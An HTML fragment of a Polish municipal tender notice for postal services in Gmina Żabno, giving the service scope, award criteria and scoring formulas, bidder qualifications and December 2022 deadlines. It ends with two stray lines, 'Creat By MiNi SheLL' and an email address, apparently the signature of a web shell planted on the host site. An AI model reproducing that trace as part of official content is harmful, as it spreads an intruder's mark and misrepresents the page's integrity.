Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> b)	część 2 pn. „Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych adresatom spoza terenu Gminy Żabno”<br/>•	Przez pojęcie „adresatów spoza terenu Gminy Żabno” należy rozumieć adresatów, których docelowe miejsce dostarczenia przesyłki znajduje się poza granicami administracyjnymi Gminy Żabno.<br/>•	Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym <br/>i zagranicznym w zakresie przyjmowania, przemieszczania, doręczania przesyłek pocztowych, w tym doręczeń wynikających z Kodeksu postępowania administracyjnego <br/>i ordynacji podatkowej i ich ewentualnych zwrotów.<br/>•	Usługi będące przedmiotem zamówienia będą świadczone zgodnie z przepisami powszechnie obowiązującego prawa, w szczególności zgodnie z przepisami:<br/>-	ustawą z dnia 23 listopada 2012 r. Prawo pocztowe i wydanymi na jej podstawie aktami wykonawczymi,<br/>-	ustawą z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego regulującej tryb doręczania pism nadawanych w postępowaniu administracyjnym,<br/>-	ustawą z dnia 29 sierpnia 1997 r. Ordynacja podatkowa regulującej tryb doręczania pism nadawanych w trybie ordynacji podatkowej,<br/>-	ustawą z dnia 17 listopada 1964 r. Kodeks postępowania cywilnego regulującym tryb doręczania pism nadawanych w postępowaniu cywilnym,<br/>-	innymi powszechnie obowiązującymi przepisami oraz zgodnie z regulaminem świadczenia usług pocztowych obowiązujący u Usługobiorcy.<br/>•	Zamawiający dopuszcza następujące sposoby przekazania Wykonawcy przesyłek pocztowych, wg dziennych zestawień sporządzonych przez pracownika Urzędu Miejskiego, codziennie w dni robocze tj. od poniedziałku do piątku: <br/>a)	odbiór przez upoważnionego pracownika Wykonawcy ww. przesyłek z Dziennika Podawczego Urzędu Miejskiego w Żabnie <br/>b)	dostarczenie ww. przesyłek przez upoważnionego pracownika Zamawiającego, do placówki Wykonawcy.<br/>•	Doręczania zwrotnych potwierdzeń odbioru przesyłek rejestrowanych oraz przesyłek zwróconych po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy, nie później jednak, niż w ciągu 7 dni po zaistnieniu którejś z wymienionych okoliczności, w dni robocze od poniedziałku do piątku, do siedziby Urzędu Miejskiego w Żabnie. <br/>•	Wykonawca dostarczy Zamawiającemu nieodpłatnie oznaczenia przesyłek oraz druków zwrotnego potwierdzenia odbioru. Treści zamieszczone na druku winny odzwierciedlać wymogi prawidłowego doręczenia przesyłki zgodnie z zasadami określonymi w ustawie Kodeks postępowania administracyjnego.<br/>•	Opakowanie przesyłek listowych stanowi koperta Zamawiającego, odpowiednio zabezpieczona. Opakowanie paczki powinno stanowić zabezpieczenie przed dostępem do jej zawartości. Ponadto powinno uniemożliwiać uszkodzenie przesyłki w czasie przemieszczania.<br/>•	Przyjęcie przesyłek do obrotu pocztowego przez Wykonawcę będzie każdorazowo dokumentowane pieczęcią, podpisem i datą w pocztowej książce nadawczej dla przesyłek rejestrowanych oraz na zestawieniu ilościowo-wartościowym wg poszczególnych kategorii wagowych dla przesyłek nierejestrowanych<br/>•	Z tytułu niewykonania lub nienależytego wykonania umowy, w tym utraty, ubytku lub uszkodzenia przesyłki, Zamawiającemu przysługuje odszkodowanie oraz inne roszczenia na zasadach i wysokości określonych w ustawie Prawo pocztowe. <br/>•	Ilości poszczególnych przesyłek, wskazane w załączniku nr 4.2 do SWZ - Formularz asortymentowo-cenowy(część 2) są wielkościami oszacowanymi na podstawie faktycznie realizowanych przesyłek w roku poprzednim i służą wyłącznie wyliczeniu cen ofert w celu ich porównania i wyboru najkorzystniejszej oferty. Wykonawcy, z którym Zamawiający podpisze umowę, nie przysługuje roszczenie o realizację usługi w wielkościach podanych we wskazanym załączniku. <br/>•	Wynagrodzenie należne z tytułu usług pocztowych płatne będzie każdorazowo na podstawie prawidłowo wystawionej faktury wraz ze specyfikacją wykonanych usług, stosując miesięczny okres rozliczeniowy, w terminie 30 dni od daty doręczenia Zamawiającemu. <br/> <br/>3)	Wykonawca w formularzu ofertowym określi szacunkową cenę oferty brutto w zł (PLN), która stanowić będzie iloczyn szacunkowej ilości asortymentu (szacunkowa liczba została określona w formularzu asortymentowo –cenowym, odpowiednio dla części 1 - załącznik nr 4.1 i dla części 2 - załącznik nr 4.2 do SWZ) i cen jednostkowych zaoferowanych przez Wykonawcę w niniejszym formularzu. Szacunkowa, obliczona w ww. sposób cena stanowić będzie podstawę oceny i wyboru oferty najkorzystniejszej.<br/>4)	Podana w ofercie cena musi uwzględniać wszystkie koszty składające się na prawidłową realizację przedmiotu zamówienia wynikające z opisu przedmiotu zamówienia. <br/>5)	Wykonawca winien przewidzieć wszystkie okoliczności, które zmierzają do prawidłowego i należytego wykonania przedmiotu zamówienia oraz, które mogą wpłynąć na cenę zamówienia. <br/>6)	Rzeczywiste wynagrodzenie należne Wykonawcy będzie zależne od ilości faktycznie wykonanej ilości poszczególnych przesyłek pocztowych odpowiednio przemnożone przez ceny jednostkowe brutto zawarte w „Formularzu asortymentowo-cenowym”, stanowiącym odpowiednio dla części 1 - załącznik nr 4.1 i dla części 2 - załącznik nr 4.2 do SWZ<br/>7)	Płatność następować będzie na podstawie faktur wystawianych po zakończeniu każdego kalendarzowego miesiąca świadczenia usług. Dlatego też formularze asortymentowo-cenowe mają na celu umożliwienie dokonania wyceny poszczególnych elementów usług. <br/>8)	Rozliczenie między Zamawiającym, a Wykonawcą prowadzone będzie w walucie PLN.<br/><br/>Uwagi końcowe: <br/>–	Wykonawca wykona przedmiot zamówienia z należytą starannością, zgodnie z aktualnie obowiązującymi w tym zakresie przepisami, normami i standardami, etyką zawodową oraz postanowieniami niniejszej SWZ <br/>–	Do wykonania przedmiotu zamówienia Wykonawca użyje wyłącznie urządzeń, sprzętu <br/>i materiałów własnych, posiadających wymagane atesty i certyfikaty.<br/>–	W czasie realizacji przedmiotu zamówienia Wykonawca będzie usuwał i składował wszelkie urządzenia pomocnicze we własnym zakresie i na własny koszt,<br/>–	Wszelkie inne koszty realizacji przedmiotu zamówienia (koszty mediów – energia elektryczna, woda, opłaty, i inne), konieczne do poniesienia w celu prawidłowego wykonania zamówienia w czasie obowiązywania zawartej umowy, poniesie Wykonawca.<br/>–	Należy zachować szczególną ostrożność i zminimalizować uciążliwości związane <br/>z prowadzonymi pracami gdyż Wykonawca ponosił będzie pełną odpowiedzialność za szkody oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich, a powstałych w związku z prowadzonymi pracami w czasie obowiązywania umowy.<br/>–	Wykonawca jest odpowiedzialny za staranne zapoznanie się z dokumentami zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64113000-1 - Usługi pocztowe dotyczące paczek</p> <p class="mb-0">64120000-3 - Usługi kurierskie</p> <p class="mb-0">64112000-4 - Usługi pocztowe dotyczące listów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Znaczenie (pkt)<br/>1.	Cena	60 punktów<br/>2.	Termin płatności faktury	20 punktów<br/>3.	Sposób przekazania przesyłek pocztowych Wykonawcy	20 punktów<br/>	Razem	100 punktów<br/><br/>2)	Sposób dokonywania oceny ofert w kryterium „cena - Pc”:<br/><br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>3)	Sposób dokonywania oceny ofert w kryterium „termin płatności faktury - Pf”<br/>a)	20 punktów – płatność faktury w terminie 30 dni od dnia jej doręczenia Zamawiającemu <br/>b)	10 punktów – płatność faktury w terminie 21 dni od dnia jej doręczenia Zamawiającemu<br/>c)	0 punktów – płatność faktury w terminie 14 dni od dnia jej doręczenia Zamawiającemu<br/> <br/>4)	Sposób dokonywania oceny ofert w kryterium „Forma przekazania przesyłek pocztowych Wykonawcy - Ps”<br/>a)	20 punktów – przekazanie przesyłek pocztowych Wykonawcy następuje w sposób odbioru przez upoważnionego pracownika Wykonawcy ww. przesyłek z Dziennika Podawczego Urzędu Miejskiego w Żabnie<br/>b)	0 punktów – przekazanie przesyłek pocztowych Wykonawcy następuje w sposób dostarczenia ww. przesyłek przez upoważnionego pracownika Zamawiającego do placówki Wykonawcy, z zastrzeżeniem, iż niniejsza placówka nie może znajdować się dalej niż 1 km od siedziby Zamawiającego<br/><br/>5)	Łączna wartość uzyskanych przez ofertę punktów ustalona zostanie jako suma punktów uzyskanych w kryterium „cena - Pc” , „termin płatności faktury – Pf” i „Forma przekazania przesyłek pocztowych Wykonawcy - Ps”<br/><br/>6)	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>7)	Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Sposób przekazania przesyłek pocztowych Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>	<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>a)	Część 1 pn. „Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych adresatom z terenu Gminy Żabno”<br/><br/>Zamawiający nie określa warunku w ww. zakresie<br/><br/>b)	Część 2 pn. „Świadczenie usług pocztowych w zakresie przyjmowania, przemieszczania i doręczania przesyłek pocztowych adresatom z poza terenu Gminy Żabno”<br/><br/>Zamawiający uzna, że wykonawca spełnia warunek w/w zakresie jeżeli wykaże, że posiada uprawnienia do prowadzenia działalności polegającej na świadczeniu usług pocztowych w obrocie krajowym i zagranicznym zgodnie z przepisami ustawy z dnia 23 listopada 2012 r. Prawo pocztowe ( Dz.U. z 2022 r. poz. 896 ze zm.) <br/><br/>Uwaga: w przypadku wykonania usługi przez podmioty wspólnie składające ofertę warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa powyżej - uznawać się będzie za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada wymagane uprawnienia i zrealizuje usługi, do których te uprawnienia są wymagane<br/><br/>Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony został w Załączniku nr 8 do SWZ.<br/><br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>2)	W zakresie potwierdzenia braku podstaw do wykluczenia (dotyczy części 1 i 2 postępowania):<br/>	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu złożonym na podstawie art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>b)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>c)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji,<br/>d)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 roku o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego,<br/><br/>którego wzór stanowi Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty, wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1)	W zakresie potwierdzenia spełniania warunków udziału w postępowaniu (dotyczy części 2 postępowania):<br/>	dokumentu potwierdzającego, że Wykonawca jest wpisany do rejestru operatorów pocztowych w odniesieniu do całego obszaru Rzeczypospolitej Polskiej i za granicą prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. Prawo pocztowe ( Dz.U. z 2022 r. poz. 896 ze zm.).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy w zakresie:<br/>terminu, wynagrodzenia, sposobu rozliczania,<br/>Szczegółowy opis zmian umowy określa załącznik nr 5 do SWZ - Istotne postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-23 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com